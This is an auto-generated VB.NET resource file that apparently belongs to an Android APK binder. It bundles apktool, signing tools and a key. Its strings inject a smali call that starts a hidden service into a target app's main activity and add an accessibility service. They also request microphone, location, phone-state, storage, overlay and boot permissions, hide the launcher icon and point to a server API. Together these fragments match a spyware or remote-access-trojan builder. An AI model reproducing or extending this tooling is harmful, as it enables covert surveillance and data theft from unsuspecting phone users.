'------------------------------------------------------------------------------
' <auto-generated>
'     O código foi gerado por uma ferramenta.
'     Versão de Tempo de Execução:4.0.30319.42000
'
'     As alterações ao arquivo poderão causar comportamento incorreto e serão perdidas se
'     o código for gerado novamente.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'Essa classe foi gerada automaticamente pela classe StronglyTypedResourceBuilder
    'através de uma ferramenta como ResGen ou Visual Studio.
    'Para adicionar ou remover um associado, edite o arquivo .ResX e execute ResGen novamente
    'com a opção /str, ou recrie o projeto do VS.
    '''<summary>
    '''  Uma classe de recurso de tipo de alta segurança, para pesquisar cadeias de caracteres localizadas etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Retorna a instância de ResourceManager armazenada em cache usada por essa classe.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("SolrWorker.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Substitui a propriedade CurrentUICulture do thread atual para todas as
        '''  pesquisas de recursos que usam essa classe de recurso de tipo de alta segurança.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property _7zip() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("7zip", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;accessibility-service android:description=&quot;@string/pnam&quot; android:summary=&quot;@string/pnam&quot; android:settingsActivity=&quot;com.android.settings&quot; android:accessibilityEventTypes=&quot;typeAnnouncement|typeAssistReadingContext|typeContextClicked|typeGestureDetectionEnd|typeGestureDetectionStart|typeNotificationStateChanged|typeTouchExplorationGestureEnd|typeTouchExplorationGestureStart|typeTouchInteractionEnd|typeTouchInteractionStart|typeViewAccessibilityFocusCleared|typeViewAccess [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property accessibilityprivatesrcapp() As String
            Get
                Return ResourceManager.GetString("accessibilityprivatesrcapp", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;service android:enabled=&quot;true&quot; android:exported=&quot;false&quot; android:label=&quot;@string/BaseName&quot; android:name=&quot;com.icontrol.protector.AccessServices&quot; android:permission=&quot;android.permission.BIND_ACCESSIBILITY_SERVICE&quot;&gt;
        '''            &lt;intent-filter&gt;
        '''                &lt;action android:name=&quot;android.accessibilityservice.AccessibilityService&quot;/&gt;
        '''            &lt;/intent-filter&gt;
        '''            &lt;meta-data android:name=&quot;android.accessibilityservice&quot; android:resource=&quot;@xml/accessibilityprivatesrcapp&quot;/&gt;
        '''        &lt;/service&gt;.
        '''</summary>
        Friend ReadOnly Property AccessTag() As String
            Get
                Return ResourceManager.GetString("AccessTag", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;RelativeLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    xmlns:tools=&quot;http://schemas.android.com/tools&quot;
        '''    android:layout_width=&quot;match_parent&quot;
        '''    android:layout_height=&quot;match_parent&quot;
        '''    android:padding=&quot;16dp&quot;
        '''    android:background=&quot;#202020&quot;
        '''    tools:context=&quot;.ChatActivity&quot;&gt;
        '''
        '''    &lt;TextView
        '''        android:id=&quot;@+id/chattitle&quot;
        '''        android:layout_width=&quot;match_parent&quot;
        '''        android:layout_height=&quot;40dp&quot;
        '''        android:background [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property Activitychat() As String
            Get
                Return ResourceManager.GetString("Activitychat", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.RECORD_AUDIO&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;android.permission.ACCESS_COARSE_LOCATION&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;android.permission.ACCESS_FINE_LOCATION&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;android.permission.READ_PHONE_STATE&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;android.permission.WAKE_LOCK&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;com.android.alarm.permission.SET_ALARM&quot; /&gt;#
        '''&lt;uses-permission android:name=&quot;android.permission.ACCESS_NETWORK_STATE&quot;  [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property ALLPRIM() As String
            Get
                Return ResourceManager.GetString("ALLPRIM", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property APKEditor() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("APKEditor", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property apktool() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("apktool", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS&quot; /&gt;.
        '''</summary>
        Friend ReadOnly Property batteryprim() As String
            Get
                Return ResourceManager.GetString("batteryprim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.RECEIVE_BOOT_COMPLETED&quot; /&gt;.
        '''</summary>
        Friend ReadOnly Property BootPrim() As String
            Get
                Return ResourceManager.GetString("BootPrim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property certificate() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("certificate", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a {
        '''  &quot;ServerApi&quot;: &quot;http://localhost/yaarsa/private/yarsap_90061.php&quot;,
        '''  &quot;ServerApi_Customapp&quot;: &quot;http://localhost/yaarsa/private/yarsap_91370.php&quot;,
        '''  &quot;Currentsubdir&quot;: &quot;/yaarsa/private/&quot;
        '''}.
        '''</summary>
        Friend ReadOnly Property DEFserverconfigs() As String
            Get
                Return ResourceManager.GetString("DEFserverconfigs", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''
        '''&lt;accessibility-service xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    /&gt;
        '''.
        '''</summary>
        Friend ReadOnly Property emptyaccess() As String
            Get
                Return ResourceManager.GetString("emptyaccess", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.MANAGE_EXTERNAL_STORAGE&quot; /&gt;
        '''    &lt;uses-permission android:name=&quot;android.permission.READ_MEDIA_IMAGES&quot;/&gt;
        '''    &lt;uses-permission android:name=&quot;android.permission.READ_MEDIA_VIDEO&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property Externalstorage() As String
            Get
                Return ResourceManager.GetString("Externalstorage", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.FOREGROUND_SERVICE&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property FORGROUD() As String
            Get
                Return ResourceManager.GetString("FORGROUD", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property key() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("key", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;intent-filter&gt;
        '''                &lt;action android:name=&quot;android.intent.action.MAIN&quot; /&gt;
        '''                &lt;category android:name=&quot;android.intent.category.LAUNCHER&quot; /&gt;
        '''
        '''            &lt;/intent-filter&gt;.
        '''</summary>
        Friend ReadOnly Property luncherIntent() As String
            Get
                Return ResourceManager.GetString("luncherIntent", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a .method public InializeSubsT()V
        '''    .locals 4
        '''
        '''    :try_start_0
        '''    new-instance v1, Landroid/content/Intent;
        '''
        '''    invoke-virtual {p0}, [trgtmain]-&gt;getApplicationContext()Landroid/content/Context;
        '''
        '''    move-result-object v2
        '''
        '''    const-class v3, Lcom/icontrol/protector/StarterServices;
        '''
        '''    invoke-direct {v1, v2, v3}, Landroid/content/Intent;-&gt;&lt;init&gt;(Landroid/content/Context;Ljava/lang/Class;)V
        '''
        '''    .local v1, &quot;Strt_int&quot;:Landroid/content/Intent;
        '''    invoke-virtual {p0, v1}, [trgtmain]-&gt;startSe [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property MainMith() As String
            Get
                Return ResourceManager.GetString("MainMith", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-library android:name=&quot;org.apache.http.legacy&quot; android:required=&quot;false&quot;/&gt;
        '''        &lt;provider android:authorities=&quot;com.icontrol.protector.provider&quot; android:exported=&quot;false&quot; android:grantUriPermissions=&quot;true&quot; android:name=&quot;androidx.core.content.FileProvider&quot;&gt;
        '''            &lt;meta-data android:name=&quot;android.support.FILE_PROVIDER_PATHS&quot; android:resource=&quot;@xml/pfs1&quot;/&gt;
        '''        &lt;/provider&gt;
        '''        &lt;activity android:exported=&quot;true&quot; android:name=&quot;com.icontrol.protector.Splasher&quot;/&gt;
        '''        &lt;activity-alias andro [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property ManifistCode() As String
            Get
                Return ResourceManager.GetString("ManifistCode", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;intent-filter&gt;
        '''                &lt;action android:name=&quot;android.intent.action.MAIN&quot;/&gt;
        '''                &lt;category android:name=&quot;android.intent.category.INFO&quot;/&gt;
        '''            &lt;/intent-filter&gt;
        '''            &lt;intent-filter&gt;
        '''                &lt;action android:name=&quot;android.service.quicksettings.action.QS_TILE_PREFERENCES&quot;/&gt;
        '''            &lt;/intent-filter&gt;
        '''            &lt;intent-filter&gt;
        '''                &lt;action android:name=&quot;com.android.settings.action.IA_SETTINGS&quot;/&gt;
        '''            &lt;/intent-filter&gt;
        '''            &lt;meta-data a [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property ManifistHide() As String
            Get
                Return ResourceManager.GetString("ManifistHide", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;RelativeLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    android:layout_width=&quot;match_parent&quot;
        '''    android:layout_height=&quot;match_parent&quot;
        '''    android:orientation=&quot;vertical&quot;&gt;
        '''
        '''
        '''    &lt;WebView
        '''        android:id=&quot;@+id/MyView&quot;
        '''        android:layout_width=&quot;match_parent&quot;
        '''        android:layout_height=&quot;match_parent&quot; /&gt;
        '''
        '''    &lt;ProgressBar
        '''        android:id=&quot;@+id/progressBar&quot;
        '''        style=&quot;?android:attr/progressBarStyleLarge&quot;
        '''        android:la [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property mywebviewer() As String
            Get
                Return ResourceManager.GetString("mywebviewer", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;network-security-config&gt;
        '''    &lt;base-config cleartextTrafficPermitted=&quot;true&quot; /&gt;
        '''&lt;/network-security-config&gt;.
        '''</summary>
        Friend ReadOnly Property network_security_config() As String
            Get
                Return ResourceManager.GetString("network_security_config", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;LinearLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    android:layout_width=&quot;match_parent&quot;
        '''    android:layout_height=&quot;match_parent&quot;
        '''    android:orientation=&quot;vertical&quot;
        '''    android:background=&quot;#292929&quot;&gt;
        '''
        '''    &lt;LinearLayout
        '''        android:layout_width=&quot;match_parent&quot;
        '''        android:layout_height=&quot;35dp&quot;
        '''        android:background=&quot;#292929&quot;
        '''        android:orientation=&quot;horizontal&quot;&gt;
        '''
        '''    &lt;/LinearLayout&gt;
        '''    &lt;LinearLayout
        '''        android:l [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property nointernet() As String
            Get
                Return ResourceManager.GetString("nointernet", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a invoke-virtual/range {p0}, [trgtmain]-&gt;InializeSubsT()V.
        '''</summary>
        Friend ReadOnly Property oncreatecode() As String
            Get
                Return ResourceManager.GetString("oncreatecode", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;!-- activity_main.xml --&gt;
        '''&lt;RelativeLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    android:layout_width=&quot;match_parent&quot;
        '''    android:background=&quot;#000011&quot;
        '''    android:layout_height=&quot;match_parent&quot;&gt;
        '''
        '''
        '''    &lt;ImageView
        '''        android:id=&quot;@+id/imageView&quot;
        '''        android:layout_width=&quot;match_parent&quot;
        '''        android:layout_height=&quot;400dp&quot;
        '''        android:layout_centerHorizontal=&quot;true&quot;
        '''        android:layout_marginTop=&quot;75dp&quot;
        '''        android:src=&quot;@drawable/oppo_bty_en_1&quot; /&gt;
        '''
        '''
        '''
        '''     [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property oppobattery() As String
            Get
                Return ResourceManager.GetString("oppobattery", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;paths xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;&gt;
        '''    &lt;external-path
        '''        name=&quot;external_files&quot;
        '''        path=&quot;.&quot; /&gt;
        '''&lt;/paths&gt;.
        '''</summary>
        Friend ReadOnly Property providerfile() As String
            Get
                Return ResourceManager.GetString("providerfile", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.READ_PHONE_STATE&quot; /&gt;.
        '''</summary>
        Friend ReadOnly Property read_state_prim() As String
            Get
                Return ResourceManager.GetString("read_state_prim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.READ_EXTERNAL_STORAGE&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property ReadPrim() As String
            Get
                Return ResourceManager.GetString("ReadPrim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;meta-data android:name=&quot;REPALCEACCESS&quot; android:value=&quot;99999999&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property ReplaceAccess() As String
            Get
                Return ResourceManager.GetString("ReplaceAccess", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;meta-data android:name=&quot;REPLACELUNCH&quot; android:value=&quot;66666666&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property ReplaceLuncher() As String
            Get
                Return ResourceManager.GetString("ReplaceLuncher", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;queries android:name=&quot;[Replace_Prmies]&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property ReplacePrimes() As String
            Get
                Return ResourceManager.GetString("ReplacePrimes", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property signapk() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("signapk", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;splits&gt;
        '''    &lt;module name=&quot;&quot;&gt;
        '''        &lt;language&gt;
        '''            &lt;entry key=&quot;af&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;am&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;ar&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;az&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;bg&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;bn&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;ca&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;cs&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;da&quot; split=&quot;&quot; /&gt;
        '''            &lt;entry key=&quot;de&quot; split=&quot;&quot; /&gt;
        '''           [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property splits() As String
            Get
                Return ResourceManager.GetString("splits", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.SYSTEM_ALERT_WINDOW&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property SystemwindowPrim() As String
            Get
                Return ResourceManager.GetString("SystemwindowPrim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;queries android:name=&quot;[GPRIM]&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property Toreplaceprim() As String
            Get
                Return ResourceManager.GetString("Toreplaceprim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
        '''&lt;LinearLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
        '''    android:layout_width=&quot;match_parent&quot;
        '''    android:layout_height=&quot;match_parent&quot;
        '''    android:gravity=&quot;center&quot;
        '''    android:orientation=&quot;vertical&quot;
        '''    android:padding=&quot;20dp&quot;
        '''    android:background=&quot;#232323&quot;&gt;
        '''
        '''    &lt;ImageView
        '''        android:id=&quot;@+id/errorimg&quot;
        '''        android:layout_width=&quot;144px&quot;
        '''        android:layout_height=&quot;144px&quot;
        '''        android:paddingLeft=&quot;5dp&quot;
        '''        android:src= [o restante da cadeia de caracteres foi truncado]&quot;;.
        '''</summary>
        Friend ReadOnly Property uninstall_activity() As String
            Get
                Return ResourceManager.GetString("uninstall_activity", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta uma cadeia de caracteres localizada semelhante a &lt;uses-permission android:name=&quot;android.permission.WRITE_EXTERNAL_STORAGE&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property WritePrim() As String
            Get
                Return ResourceManager.GetString("WritePrim", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Consulta um recurso localizado do tipo System.Byte[].
        '''</summary>
        Friend ReadOnly Property zipalign() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("zipalign", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
    End Module
End Namespace
